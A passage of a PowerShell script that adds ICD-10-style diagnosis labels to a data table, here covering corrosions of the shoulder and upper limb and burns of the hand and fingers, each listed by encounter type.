forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified forearm","Corrosion of first degree of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified forearm","Corrosion of first degree of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right elbow","Corrosion of first degree of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right elbow","Corrosion of first degree of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right elbow","Corrosion of first degree of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left elbow","Corrosion of first degree of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left elbow","Corrosion of first degree of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left elbow","Corrosion of first degree of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified elbow","Corrosion of first degree of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified elbow","Corrosion of first degree of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified elbow","Corrosion of first degree of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right upper arm","Corrosion of first degree of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right upper arm","Corrosion of first degree of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right upper arm","Corrosion of first degree of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left upper arm","Corrosion of first degree of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left upper arm","Corrosion of first degree of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left upper arm","Corrosion of first degree of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified upper arm","Corrosion of first degree of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified upper arm","Corrosion of first degree of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified upper arm","Corrosion of first degree of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right axilla","Corrosion of first degree of right axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right axilla","Corrosion of first degree of right axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right axilla","Corrosion of first degree of right axilla, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left axilla","Corrosion of first degree of left axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left axilla","Corrosion of first degree of left axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left axilla","Corrosion of first degree of left axilla, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified axilla","Corrosion of first degree of unspecified axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified axilla","Corrosion of first degree of unspecified axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified axilla","Corrosion of first degree of unspecified axilla, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right shoulder","Corrosion of first degree of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right shoulder","Corrosion of first degree of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right shoulder","Corrosion of first degree of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left shoulder","Corrosion of first degree of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left shoulder","Corrosion of first degree of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left shoulder","Corrosion of first degree of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified shoulder","Corrosion of first degree of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified shoulder","Corrosion of first degree of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified shoulder","Corrosion of first degree of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right scapular region","Corrosion of first degree of right scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right scapular region","Corrosion of first degree of right scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right scapular region","Corrosion of first degree of right scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left scapular region","Corrosion of first degree of left scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left scapular region","Corrosion of first degree of left scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left scapular region","Corrosion of first degree of left scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified scapular region","Corrosion of first degree of unspecified scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified scapular region","Corrosion of first degree of unspecified scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified scapular region","Corrosion of first degree of unspecified scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of right shoulder and upper limb, except wrist and hand","Corrosion of first degree of multiple sites of right shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of right shoulder and upper limb, except wrist and hand","Corrosion of first degree of multiple sites of right shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of right shoulder and upper limb, except wrist and hand","Corrosion of first degree of multiple sites of right shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of left shoulder and upper limb, except wrist and hand","Corrosion of first degree of multiple sites of left shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of left shoulder and upper limb, except wrist and hand","Corrosion of first degree of multiple sites of left shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of left shoulder and upper limb, except wrist and hand","Corrosion of first degree of multiple sites of left shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Corrosion of first degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Corrosion of first degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Corrosion of first degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of shoulder and upper limb, except wrist and hand, unspecified site","Corrosion of second degree of shoulder and upper limb, except wrist and hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of shoulder and upper limb, except wrist and hand, unspecified site","Corrosion of second degree of shoulder and upper limb, except wrist and hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of shoulder and upper limb, except wrist and hand, unspecified site","Corrosion of second degree of shoulder and upper limb, except wrist and hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right forearm","Corrosion of second degree of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right forearm","Corrosion of second degree of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right forearm","Corrosion of second degree of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left forearm","Corrosion of second degree of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left forearm","Corrosion of second degree of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left forearm","Corrosion of second degree of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified forearm","Corrosion of second degree of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified forearm","Corrosion of second degree of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified forearm","Corrosion of second degree of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right elbow","Corrosion of second degree of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right elbow","Corrosion of second degree of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right elbow","Corrosion of second degree of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left elbow","Corrosion of second degree of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left elbow","Corrosion of second degree of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left elbow","Corrosion of second degree of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified elbow","Corrosion of second degree of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified elbow","Corrosion of second degree of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified elbow","Corrosion of second degree of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right upper arm","Corrosion of second degree of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right upper arm","Corrosion of second degree of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right upper arm","Corrosion of second degree of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left upper arm","Corrosion of second degree of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left upper arm","Corrosion of second degree of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left upper arm","Corrosion of second degree of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified upper arm","Corrosion of second degree of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified upper arm","Corrosion of second degree of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified upper arm","Corrosion of second degree of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right axilla","Corrosion of second degree of right axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right axilla","Corrosion of second degree of right axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right axilla","Corrosion of second degree of right axilla, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left axilla","Corrosion of second degree of left axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left axilla","Corrosion of second degree of left axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left axilla","Corrosion of second degree of left axilla, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified axilla","Corrosion of second degree of unspecified axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified axilla","Corrosion of second degree of unspecified axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified axilla","Corrosion of second degree of unspecified axilla, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right shoulder","Corrosion of second degree of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right shoulder","Corrosion of second degree of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right shoulder","Corrosion of second degree of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left shoulder","Corrosion of second degree of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left shoulder","Corrosion of second degree of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left shoulder","Corrosion of second degree of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified shoulder","Corrosion of second degree of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified shoulder","Corrosion of second degree of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified shoulder","Corrosion of second degree of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right scapular region","Corrosion of second degree of right scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right scapular region","Corrosion of second degree of right scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of right scapular region","Corrosion of second degree of right scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left scapular region","Corrosion of second degree of left scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left scapular region","Corrosion of second degree of left scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of left scapular region","Corrosion of second degree of left scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified scapular region","Corrosion of second degree of unspecified scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified scapular region","Corrosion of second degree of unspecified scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of unspecified scapular region","Corrosion of second degree of unspecified scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of right shoulder and upper limb, except wrist and hand","Corrosion of second degree of multiple sites of right shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of right shoulder and upper limb, except wrist and hand","Corrosion of second degree of multiple sites of right shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of right shoulder and upper limb, except wrist and hand","Corrosion of second degree of multiple sites of right shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of left shoulder and upper limb, except wrist and hand","Corrosion of second degree of multiple sites of left shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of left shoulder and upper limb, except wrist and hand","Corrosion of second degree of multiple sites of left shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of left shoulder and upper limb, except wrist and hand","Corrosion of second degree of multiple sites of left shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Corrosion of second degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Corrosion of second degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of second degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Corrosion of second degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of shoulder and upper limb, except wrist and hand, unspecified site","Corrosion of third degree of shoulder and upper limb, except wrist and hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of shoulder and upper limb, except wrist and hand, unspecified site","Corrosion of third degree of shoulder and upper limb, except wrist and hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of shoulder and upper limb, except wrist and hand, unspecified site","Corrosion of third degree of shoulder and upper limb, except wrist and hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right forearm","Corrosion of third degree of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right forearm","Corrosion of third degree of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right forearm","Corrosion of third degree of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left forearm","Corrosion of third degree of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left forearm","Corrosion of third degree of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left forearm","Corrosion of third degree of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified forearm","Corrosion of third degree of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified forearm","Corrosion of third degree of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified forearm","Corrosion of third degree of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right elbow","Corrosion of third degree of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right elbow","Corrosion of third degree of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right elbow","Corrosion of third degree of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left elbow","Corrosion of third degree of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left elbow","Corrosion of third degree of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left elbow","Corrosion of third degree of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified elbow","Corrosion of third degree of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified elbow","Corrosion of third degree of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified elbow","Corrosion of third degree of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right upper arm","Corrosion of third degree of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right upper arm","Corrosion of third degree of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right upper arm","Corrosion of third degree of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left upper arm","Corrosion of third degree of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left upper arm","Corrosion of third degree of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left upper arm","Corrosion of third degree of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified upper arm","Corrosion of third degree of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified upper arm","Corrosion of third degree of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified upper arm","Corrosion of third degree of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right axilla","Corrosion of third degree of right axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right axilla","Corrosion of third degree of right axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right axilla","Corrosion of third degree of right axilla, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left axilla","Corrosion of third degree of left axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left axilla","Corrosion of third degree of left axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left axilla","Corrosion of third degree of left axilla, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified axilla","Corrosion of third degree of unspecified axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified axilla","Corrosion of third degree of unspecified axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified axilla","Corrosion of third degree of unspecified axilla, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right shoulder","Corrosion of third degree of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right shoulder","Corrosion of third degree of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right shoulder","Corrosion of third degree of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left shoulder","Corrosion of third degree of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left shoulder","Corrosion of third degree of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left shoulder","Corrosion of third degree of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified shoulder","Corrosion of third degree of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified shoulder","Corrosion of third degree of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified shoulder","Corrosion of third degree of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right scapular region","Corrosion of third degree of right scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right scapular region","Corrosion of third degree of right scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of right scapular region","Corrosion of third degree of right scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left scapular region","Corrosion of third degree of left scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left scapular region","Corrosion of third degree of left scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of left scapular region","Corrosion of third degree of left scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified scapular region","Corrosion of third degree of unspecified scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified scapular region","Corrosion of third degree of unspecified scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of unspecified scapular region","Corrosion of third degree of unspecified scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of right shoulder and upper limb, except wrist and hand","Corrosion of third degree of multiple sites of right shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of right shoulder and upper limb, except wrist and hand","Corrosion of third degree of multiple sites of right shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of right shoulder and upper limb, except wrist and hand","Corrosion of third degree of multiple sites of right shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of left shoulder and upper limb, except wrist and hand","Corrosion of third degree of multiple sites of left shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of left shoulder and upper limb, except wrist and hand","Corrosion of third degree of multiple sites of left shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of left shoulder and upper limb, except wrist and hand","Corrosion of third degree of multiple sites of left shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Corrosion of third degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Corrosion of third degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of third degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Corrosion of third degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right hand, unspecified site","Burn of unspecified degree of right hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right hand, unspecified site","Burn of unspecified degree of right hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right hand, unspecified site","Burn of unspecified degree of right hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left hand, unspecified site","Burn of unspecified degree of left hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left hand, unspecified site","Burn of unspecified degree of left hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left hand, unspecified site","Burn of unspecified degree of left hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified hand, unspecified site","Burn of unspecified degree of unspecified hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified hand, unspecified site","Burn of unspecified degree of unspecified hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified hand, unspecified site","Burn of unspecified degree of unspecified hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right thumb (nail)","Burn of unspecified degree of right thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right thumb (nail)","Burn of unspecified degree of right thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right thumb (nail)","Burn of unspecified degree of right thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left thumb (nail)","Burn of unspecified degree of left thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left thumb (nail)","Burn of unspecified degree of left thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left thumb (nail)","Burn of unspecified degree of left thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified thumb (nail)","Burn of unspecified degree of unspecified thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified thumb (nail)","Burn of unspecified degree of unspecified thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified thumb (nail)","Burn of unspecified degree of unspecified thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of single right finger (nail) except thumb","Burn of unspecified degree of single right finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of single right finger (nail) except thumb","Burn of unspecified degree of single right finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of single right finger (nail) except thumb","Burn of unspecified degree of single right finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of single left finger (nail) except thumb","Burn of unspecified degree of single left finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of single left finger (nail) except thumb","Burn of unspecified degree of single left finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of single left finger (nail) except thumb","Burn of unspecified degree of single left finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified single finger (nail) except thumb","Burn of unspecified degree of unspecified single finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified single finger (nail) except thumb","Burn of unspecified degree of unspecified single finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified single finger (nail) except thumb","Burn of unspecified degree of unspecified single finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple right fingers (nail), not including thumb","Burn of unspecified degree of multiple right fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple right fingers (nail), not including thumb","Burn of unspecified degree of multiple right fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple right fingers (nail), not including thumb","Burn of unspecified degree of multiple right fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple left fingers (nail), not including thumb","Burn of unspecified degree of multiple left fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple left fingers (nail), not including thumb","Burn of unspecified degree of multiple left fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple left fingers (nail), not including thumb","Burn of unspecified degree of multiple left fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified multiple fingers (nail), not including thumb","Burn of unspecified degree of unspecified multiple fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified multiple fingers (nail), not including thumb","Burn of unspecified degree of unspecified multiple fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of 